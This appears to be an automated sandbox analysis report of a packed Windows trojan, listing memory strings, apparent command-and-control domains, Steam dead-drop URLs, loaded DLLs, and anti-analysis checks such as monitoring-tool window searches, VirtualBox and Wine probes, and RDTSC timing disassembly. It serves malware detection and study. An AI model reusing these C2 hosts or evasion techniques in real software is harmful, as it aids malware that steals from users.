    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/api
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/apid
    Source: file.exe, 00000004.00000003.1321868855.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000004.00000003.1321868855.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/LOu
    Source: file.exe, 00000004.00000003.1321750221.00000000011BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000004.00000002.1598907170.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiM
    Source: file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apifiles/76561199724331900
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowU)
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321709069.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000004.00000002.1598907170.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api:
    Source: file.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-errop
    Source: file.exe, 00000004.00000003.1321594830.0000000001209000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-man
    Source: file.exe, 00000004.00000003.1321868855.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manMV
    Source: file.exe, 00000004.00000003.1321594830.0000000001209000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000004.00000003.1321636669.0000000001200000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321728397.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49707 version: TLS 1.2

    System Summary

    barindex
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AB02284_2_00AB0228
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00ADE8A04_2_00ADE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AEA0D04_2_00AEA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AB20304_2_00AB2030
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AAA8504_2_00AAA850
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AAE1A04_2_00AAE1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AA51604_2_00AA5160
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AE4A404_2_00AE4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AAA3004_2_00AAA300
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AA7CA44_2_00AA7CA4
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AB44874_2_00AB4487
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AB049B4_2_00AB049B
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00ACCCD04_2_00ACCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00ACC4704_2_00ACC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AA35B04_2_00AA35B0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AA85904_2_00AA8590
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00ABC5F04_2_00ABC5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00ACFD104_2_00ACFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AB6EBF4_2_00AB6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AABEB04_2_00AABEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AAAF104_2_00AAAF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00ABD300 appears 47 times
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7576 -s 1940
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995423370462047
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7576
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\60f4c263-0033-4bdb-b45d-6041384cc389Jump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7576 -s 1940
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 2963456 > 1048576
    Source: file.exeStatic PE information: Raw size of dobewrry is bigger than: 0x100000 < 0x2aa000

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 4.2.file.exe.aa0000.0.unpack :EW;.rsrc :W;.idata :W;dobewrry:EW;uiaqfnoj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;dobewrry:EW;uiaqfnoj:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2e0125 should be: 0x2e2532
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: dobewrry
    Source: file.exeStatic PE information: section name: uiaqfnoj
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.982810470141253

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04414 second address: B03CB1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72B9AA7988h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub dword ptr [ebp+122D1F93h], ecx 0x00000015 mov dword ptr [ebp+122D1F93h], eax 0x0000001b push dword ptr [ebp+122D0DF5h] 0x00000021 sub dword ptr [ebp+122D2012h], edi 0x00000027 call dword ptr [ebp+122D29ACh] 0x0000002d pushad 0x0000002e cmc 0x0000002f xor eax, eax 0x00000031 cld 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D29EBh], eax 0x0000003c cld 0x0000003d mov dword ptr [ebp+122D2C3Ah], eax 0x00000043 xor dword ptr [ebp+122D29EBh], esi 0x00000049 cmc 0x0000004a mov esi, 0000003Ch 0x0000004f sub dword ptr [ebp+122D2012h], edi 0x00000055 mov dword ptr [ebp+122D29EBh], ebx 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f jmp 00007F72B9AA798Dh 0x00000064 lodsw 0x00000066 add dword ptr [ebp+122D29EBh], edi 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 add dword ptr [ebp+122D2628h], ecx 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jnl 00007F72B9AA798Ch 0x00000080 mov dword ptr [ebp+122D29EBh], esi 0x00000086 nop 0x00000087 jns 00007F72B9AA79A0h 0x0000008d pushad 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D2C3 second address: C6D2C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8209A second address: C8209E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8209E second address: C820B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B8E40BFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C820B1 second address: C820BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C820BF second address: C820D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C820D8 second address: C820F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jp 00007F72B9AA7986h 0x00000017 pop esi 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C820F0 second address: C82119 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72B8E40BFCh 0x00000008 jnc 00007F72B8E40BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F72B8E40C02h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82119 second address: C8211E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8211E second address: C82123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C821BE second address: C821C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F72B9AA7986h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C821C9 second address: C821CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C821CF second address: C821D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
